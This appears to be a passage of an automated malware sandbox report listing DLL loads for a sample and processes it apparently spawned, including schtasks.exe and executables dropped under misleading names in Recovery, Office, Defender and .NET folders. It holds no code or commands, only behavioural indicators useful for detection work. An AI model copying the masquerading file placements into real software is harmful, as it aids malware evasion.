Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: version.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Section loaded: sspicli.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: mscoree.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: version.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: windows.storage.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: wldp.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: profapi.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: cryptsp.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: rsaenh.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: sspicli.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: amsi.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: userenv.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: iphlpapi.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: dnsapi.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: winnsi.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: textshaping.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: textinputframework.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: coreuicomponents.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: coremessaging.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: ntmarta.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: coremessaging.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: wintypes.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: wintypes.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: wintypes.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: rasapi32.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: rasman.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: rtutils.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: mswsock.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Section loaded: winhttp.dll
